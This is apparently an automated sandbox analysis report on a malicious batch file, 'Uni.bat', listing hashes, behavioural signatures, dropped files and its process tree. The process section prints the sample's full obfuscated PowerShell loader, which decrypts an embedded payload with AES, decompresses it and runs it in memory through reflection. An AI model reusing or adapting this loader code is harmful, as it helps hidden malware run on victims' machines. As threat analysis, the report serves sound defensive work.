Analysis
- max time kernel: 16s
- max time network: 21s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-es
- resource tags: arch:x64, arch:x86, image:win10v2004-20230703-es, locale:es-es, os:windows10-2004-x64, system:windows
- submitted: 15/07/2023, 14:29
Static task: static1
Behavioral task: behavioral1
- Sample: Uni.bat
- Resource: win10v2004-20230703-es
General
- Target: Uni.bat
- Size: 12.7MB
- MD5: be62b93f5d396c3e0170e242524dd028
- SHA1: 99e4790126a772af2f29e065c1aef6063e8e12b8
- SHA256: d6437638c72a39b34562e272d2e61f8f1408d50a0230341a7bacb675ca30c72f
- SHA512: 6705287c045c5c0991e528006798d8c26b8e69abe0250a87e1d24c1dea7c18d1e570d7b9b604a1546d50519fc2cf41e418c417b10310a38e0da0c53db32272bb
- SSDEEP: 49152:Z5irCQcDQZMpqSIvIS/Pb3M171APKQbmVROCoGnquAwJYdbgwk654lp0IZXApwFU:w
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  pid 4508, Process Uni.bat.exe
- Drops file in Windows directory (2 IoCs)
  description: File created; ioc: C:\Windows\$sxr-seroxen2\$sxr-Uni.bat; Process: cmd.exe
  description: File opened for modification; ioc: C:\Windows\$sxr-seroxen2\$sxr-Uni.bat; Process: cmd.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 4508, Process Uni.bat.exe
  pid 4508, Process Uni.bat.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description: Token: SeDebugPrivilege; pid 4508; Process Uni.bat.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description | pid | Process | procid_target
  PID 2156 wrote to memory of 2012 | 2156 | cmd.exe | 88
  PID 2156 wrote to memory of 2012 | 2156 | cmd.exe | 88
  PID 2012 wrote to memory of 4000 | 2012 | net.exe | 89
  PID 2012 wrote to memory of 4000 | 2012 | net.exe | 89
  PID 2156 wrote to memory of 4508 | 2156 | cmd.exe | 96
  PID 2156 wrote to memory of 4508 | 2156 | cmd.exe | 96
Processes
- C:\Windows\system32\cmd.exe (PID 2156)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
  Signatures: Drops file in Windows directory; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 2012)
    Command line: net session
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4000)
      Command line: C:\Windows\system32\net1 session
  - C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe (PID 4508)
    Command line: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AhdqY($Soqyo){ $GMrUJ=[System.Security.Cryptography.Aes]::Create(); $GMrUJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GMrUJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GMrUJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n6ZNlJxqzpQ1XRiG2tuu1JmoHxwJc3mli81U2A8nQ9k='); $GMrUJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYZLgisbwIsxFzm0XsH2pQ=='); $sxZZG=$GMrUJ.CreateDecryptor(); $return_var=$sxZZG.TransformFinalBlock($Soqyo, 0, $Soqyo.Length); $sxZZG.Dispose(); $GMrUJ.Dispose(); $return_var;}function FhGev($Soqyo){ $lTYrn=New-Object System.IO.MemoryStream(,$Soqyo); $jNRyy=New-Object System.IO.MemoryStream; $CbFKP=New-Object System.IO.Compression.GZipStream($lTYrn, [IO.Compression.CompressionMode]::Decompress); $CbFKP.CopyTo($jNRyy); $CbFKP.Dispose(); $lTYrn.Dispose(); $jNRyy.Dispose(); $jNRyy.ToArray();}function CQPwX($Soqyo,$GqVhs){ $nPHkC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$Soqyo); $JxPGs=$nPHkC.EntryPoint; $JxPGs.Invoke($null, $GqVhs);}$EFkiG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($eFXlV in $EFkiG) { if ($eFXlV.StartsWith('SEROXEN')) { $dpUOE=$eFXlV.Substring(7); break; }}$OdrYv=[string[]]$dpUOE.Split('\');$UxsjS=FhGev (AhdqY ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OdrYv[0])));$mgxsE=FhGev (AhdqY ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OdrYv[1])));CQPwX $mgxsE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));CQPwX $UxsjS (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- File 1
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
- File 2
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82